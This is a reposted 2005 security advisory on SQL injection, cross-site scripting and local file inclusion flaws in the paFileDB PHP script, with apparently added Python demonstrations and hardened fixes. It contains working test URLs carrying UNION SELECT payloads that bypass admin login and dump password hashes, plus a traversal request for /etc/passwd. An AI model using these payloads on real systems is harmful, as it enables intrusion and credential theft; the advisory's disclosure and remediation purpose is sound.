
[Repost] PAFileDB Multiple Input Validation Vulnerabilities

Original link: http://hackbase.com/hacker/leak/2005061711829.html

Published: 2005-06-16
Updated: 2005-06-16

Affected systems:
PHP Arena paFileDB 3.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 1.1.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13967

paFileDB is a file-management script that lets moderators maintain a site's download database, including editing and deleting files.

paFileDB contains multiple input validation vulnerabilities, as follows:

paFileDB contains multiple SQL injection vulnerabilities. The exact impact depends on what the underlying database implementation supports, but given the nature of the affected queries it may be limited.

if ($login == "do")
{
   // $formname comes straight from the login form and is interpolated
   // into the query without escaping: this is the injection point.
   $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin
WHERE admin_username = '$formname'", 1);
   $formpw = md5($formpass);
   // Only the password column of whichever row came back is compared,
   // so a UNION row with an attacker-chosen hash passes this check.
   if ($formpw == $admin[admin_password])
   {
      $adminip = getenv ("REMOTE_ADDR");
      $ip = md5($adminip);
      $user = $formname;
      $pass = $formpw;

      if ($authmethod == "cookies")
      {
        $cookiedata = "$ip|$formname|$formpw";
        setcookie("pafiledbcookie", $cookiedata);
      }

      header("Location: admin.php");
   }
}

The variable $formname is taken directly from the submitted login form and used in the query unescaped. An attacker can therefore append a UNION SELECT that returns a row whose password column is an MD5 hash of a value they know, and bypass administrator authentication with that value as the password.
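The bypass described above, as an added example that is not code from the advisory or from paFileDB: a Python/sqlite3 model of the login query, fed the decoded formname from the advisory's SQL-injection test URL, beside a parameterised version of the same lookup. The admin table is constructed here with five columns (matching the five values the UNION payload supplies); its column names after admin_password and the stored admin password are assumptions.

```python
import hashlib
import sqlite3

# Constructed in-memory stand-in for the paFileDB admin table. The real
# schema is not on the page; the column count is taken from the advisory's
# UNION payload and the names after admin_password are assumed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pafiledb_admin ("
        "admin_id INTEGER, admin_username TEXT, admin_password TEXT, "
        "admin_email TEXT, admin_level INTEGER)"
    )
    conn.execute(
        "INSERT INTO pafiledb_admin VALUES (1, 'admin', ?, 'admin@example.invalid', 1)",
        (hashlib.md5(b"correct-horse").hexdigest(),),  # password the attacker does not know
    )
    return conn


def vulnerable_login(conn, formname, formpass):
    """Mirrors the original PHP: $formname is concatenated into the query,
    the first row is taken, and md5($formpass) is compared with its password column."""
    query = "SELECT * FROM pafiledb_admin WHERE admin_username = '%s'" % formname
    admin = conn.execute(query).fetchone()
    if admin is None:
        return False
    return hashlib.md5(formpass.encode()).hexdigest() == admin[2]


def safe_login(conn, formname, formpass):
    """Hardened form: the username is a bound parameter, so the quote in the
    payload is data rather than SQL and the UNION never becomes part of the query."""
    row = conn.execute(
        "SELECT admin_password FROM pafiledb_admin WHERE admin_username = ?",
        (formname,),
    ).fetchone()
    if row is None:
        return False
    return hashlib.md5(formpass.encode()).hexdigest() == row[0]


# md5("blah"): the hash the advisory's test URL injects alongside formpass=blah.
ATTACKER_HASH = hashlib.md5(b"blah").hexdigest()

# Decoded formname from the advisory's test URL. The first SELECT matches no
# user, the UNION row carries the attacker's own hash, and the trailing
# WHERE '1 absorbs the closing quote the original query appends.
PAYLOAD = (
    "-99' UNION SELECT admin_id, admin_username, '%s', admin_email, 1 "
    "FROM pafiledb_admin WHERE '1" % ATTACKER_HASH
)


def demo():
    conn = make_db()
    return {
        "vulnerable_bypass": vulnerable_login(conn, PAYLOAD, "blah"),
        "vulnerable_wrong_pw": vulnerable_login(conn, "admin", "wrong"),
        "safe_bypass": safe_login(conn, PAYLOAD, "blah"),
        "safe_real_pw": safe_login(conn, "admin", "correct-horse"),
    }


if __name__ == "__main__":
    print(demo())
```

With the original query the attacker logs in as the first admin row using the password "blah" without knowing the stored hash; with the bound parameter the same formname simply matches no user.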

Multiple cross-site scripting vulnerabilities exist where user-supplied input is passed to the sortby, filelist and pages parameters of the pafiledb.php script. Exploiting them could allow compromise of the application, session hijacking and other attacks against the underlying database.

paFileDB also contains a file disclosure vulnerability; the action parameter of the pafiledb.php script is affected.

if ($login == "do") { include "./includes/$action/login.php"; exit; }
if ($ad == "logout") { include "./includes/admin/logout.php"; exit; }
if ($tm == "logout") { include "./includes/team/logout.php"; exit; }

The $action variable is not filtered, so directory traversal is possible: a traversal sequence ending in %00, as in the test URL below, walks out of the includes directory and, on PHP releases before 5.3.4 (which truncate include paths at an embedded NUL byte), cuts off the /login.php suffix so that an arbitrary local file is included instead.
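The path resolution described above, as an added example that is not code from the advisory or from paFileDB: a Python model of what the unfiltered include line resolves to for a traversal value with a trailing NUL, with the pre-5.3.4 PHP truncation modelled explicitly, beside an allowlist-based dispatch that never lets the parameter reach the filesystem. The install directory and the attacker value are constructed for the example; the two allowed handler names are the ones the dispatch snippet above refers to.

```python
import posixpath
from urllib.parse import unquote

# Assumed install location (constructed for this example; not on the page).
INCLUDE_ROOT = "/var/www/pafiledb/includes"
# The only login handlers the dispatch snippet refers to.
ALLOWED_ACTIONS = ("admin", "team")


def naive_include_target(action):
    """What include "./includes/$action/login.php" resolves to with no filtering.
    `action` is the already URL-decoded query parameter."""
    return posixpath.normpath(posixpath.join(INCLUDE_ROOT, action, "login.php"))


def php_null_truncate(path):
    """Models include() on PHP releases before 5.3.4, which stopped reading the
    filename at the first NUL byte; later releases reject such paths outright."""
    return path.split("\x00", 1)[0]


def is_outside_root(path):
    """True when a resolved path no longer lives under the includes directory."""
    return not path.startswith(INCLUDE_ROOT + "/")


def safe_include_target(action):
    """Hardened dispatch: only a known handler name is ever joined to the path,
    so traversal sequences and NUL bytes are rejected before any file access."""
    if action not in ALLOWED_ACTIONS:
        raise ValueError("unknown action: %r" % action)
    return posixpath.join(INCLUDE_ROOT, action, "login.php")


# Constructed attacker value in the style of the advisory's LFI test URL.
TRAVERSAL = unquote("../../../../etc/passwd%00")


def demo():
    resolved = php_null_truncate(naive_include_target(TRAVERSAL))
    try:
        safe_include_target(TRAVERSAL)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "naive_path": resolved,              # '/etc/passwd'
        "escapes_root": is_outside_root(resolved),
        "rejected_by_allowlist": rejected,
        "legit_path": safe_include_target("admin"),
    }


if __name__ == "__main__":
    print(demo())
```

The allowlist is preferable to stripping "../" or NUL bytes from the parameter: the dispatch only ever needs two fixed handler names, so anything else is simply an error.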

<*Source: James Bercegay (security@gulftech.org)

  Link: http://marc.theaimsgroup.com/?l= ... 85787217807&w=2
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following programs (methods) may be offensive in nature and are provided for security research and teaching only. Use at your own risk!

Cross-site scripting:

http://pafiledb/pafiledb.php?act ... e%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?act ... e%29%3C%2Fscript%3E

http://pafiledb/pafiledb.php?act ... e%29%3C%2Fscript%3E

SQL injection:

http://pafiledb/pafiledb.php?act ... do&formname=-99'%20UNION%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

http://pafiledb/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://pafiledb/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

http://pafiledb/pafiledb.php?act ... 337%28%20WHERE%201/*

Local file inclusion:

http://pafiledb/pafiledb.php?act ... swd%00&login=do

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

PHP Arena
---------
The vendor has released an upgrade patch that fixes this issue; download it from the vendor's homepage:

www.phparena.net
Ah, drifting clouds, ah, the boundless expanse... isn't this exactly the same as technology?
